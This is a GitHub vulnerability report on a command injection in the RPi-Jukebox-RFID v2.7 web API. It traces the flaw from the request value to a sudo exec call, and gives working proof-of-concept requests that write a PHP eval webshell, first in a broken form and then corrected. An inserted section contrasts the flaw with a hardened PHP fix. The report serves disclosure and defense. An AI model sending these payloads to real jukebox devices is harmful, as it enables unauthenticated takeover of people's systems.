MiczFlor / RPi-Jukebox-RFID

A Raspberry Pi jukebox, playing local music, podcasts, web radio and streams triggered by RFID cards, web app or home automation. All plug and play via USB. GPIO scripts available.
http://phoniebox.de
MIT License

🐛 | RPi-Jukebox-RFID V2.7_RCE_2 #2397

Open xjzzzxx opened 1 month ago

xjzzzxx commented 1 month ago

Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report an RCE vulnerability in RPi-Jukebox-RFID v2.7 (no permissions required).

Analysis

The path of the vulnerability: htdocs\api\playlist\appendFileToPlaylist.php

```php
# htdocs\api\playlist\appendFileToPlaylist.php
$file = $_GET["file"]; // Line 26 (Source)
if ($file !== "") {
    print "Playing file " . $file;
    execScriptWithoutCheck("playout_controls.sh -c=playlistappend -v='$file'");     // Line 29 (Sink)
}

# htdocs\api\common.php
exec("sudo ".$absoluteCommand); // Line 25 (Sink)
```

Source from Line 26 ($_GET['file']).

And then there is no check point.

Finally, the tainted source is passed to exec("sudo ".$absoluteCommand); (Line 25 in htdocs\api\common.php) without another check.

PoC

GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello%27+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell2.php++%3b+echo+%27hello

Here is the version without URL encoding for ease of understanding:

GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello' ; echo "<?php @eval($_POST['pass']) ?>" > ./shell2.php ; echo 'hello

Manual verification

(two screenshots of the manual verification, not reproduced here)

The attacker can then easily connect to this webshell (/htdocs/api/playlist/shell2.php).

Logs

No response

Configuration

No response

More info

No response
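The following is an added example, not code from the RPi-Jukebox-RFID project or from the reporter. It places the vulnerable interpolation pattern from appendFileToPlaylist.php next to a hardened version that confines the requested file to a known audio folder and lets PHP quote the argument. The audio folder, the function names and the temporary demo files are assumptions; playout_controls.sh is only referenced in the returned command string, never executed.

```php
<?php
// Added example (not the project's code). Contrasts the vulnerable command
// construction in appendFileToPlaylist.php with a hardened version.
// Assumptions: $audioFolder and the helper names are hypothetical.
declare(strict_types=1);

// Vulnerable pattern: the request value is spliced into a shell command
// between single quotes, so a quote in the value terminates the argument
// and the rest of the value is parsed as further shell commands.
function buildCommandUnsafe(string $file): string
{
    return "playout_controls.sh -c=playlistappend -v='$file'";
}

// Hardened pattern: resolve the request value inside the audio folder and
// quote it with escapeshellarg(). Returns null when validation fails; the
// caller should then answer HTTP 400 and not run anything.
function buildCommandSafe(string $file, string $audioFolder): ?string
{
    // Reject empty values and embedded NUL bytes before touching the filesystem.
    if ($file === '' || strpos($file, "\0") !== false) {
        return null;
    }
    // realpath() canonicalises both paths and returns false for missing files.
    $base   = realpath($audioFolder);
    $target = realpath($audioFolder . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $target === false) {
        return null;
    }
    // The resolved target must stay below the audio folder; this also
    // catches "../" sequences and symlinks pointing outside the folder.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Pass the path relative to the audio folder. escapeshellarg() wraps it
    // in single quotes and escapes any embedded quote, so the shell always
    // sees exactly one argument regardless of the characters in $file.
    $relative = substr($target, strlen($prefix));
    return 'playout_controls.sh -c=playlistappend -v=' . escapeshellarg($relative);
}

// Demonstration on a constructed temporary audio folder.
$audioFolder = sys_get_temp_dir() . '/jukebox-demo-' . getmypid();
mkdir($audioFolder . '/album', 0700, true);
touch($audioFolder . '/album/track.mp3');

// The reporter's decoded payload, used here only as an input string.
$payload = "hello' ; echo \"<?php @eval(\\\$_POST['shell2']) ?>\" > ./shell2.php ; echo 'hello";

echo "unsafe: ", buildCommandUnsafe($payload), PHP_EOL;
var_dump(buildCommandSafe($payload, $audioFolder));            // NULL: no such file
var_dump(buildCommandSafe('../../etc/passwd', $audioFolder));  // NULL: escapes the folder
var_dump(buildCommandSafe("album/it's.mp3", $audioFolder));    // NULL: file does not exist
echo "safe:   ", buildCommandSafe('album/track.mp3', $audioFolder), PHP_EOL;

// Remove the demo folder again.
unlink($audioFolder . '/album/track.mp3');
rmdir($audioFolder . '/album');
rmdir($audioFolder);
```

Two caveats for anyone applying this to the real endpoint. First, the check requires the file to exist locally, so if the same parameter is also meant to carry web-radio URLs, those need a separate allowlist of schemes rather than a realpath() check. Second, the hardening above only fixes the argument; common.php still prefixes the whole command with sudo, so the safest long-term shape is to run the script without a shell at all (proc_open() with an argument array, available since PHP 7.4) and to restrict the sudoers entry to that one script.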

xjzzzxx commented 1 month ago

I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:

PoC (fixed)

GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello%27+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell2%27%5d)+%3f%3e%22++%3e+.%2fshell2.php++%3b+echo+%27hello

Here is the data without URL encoding for ease of understanding:

GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello' ; echo "<?php @eval(\$_POST['shell2']) ?>" > ./shell2.php ; echo 'hello

Manual verification

(two screenshots of the manual verification, not reproduced here)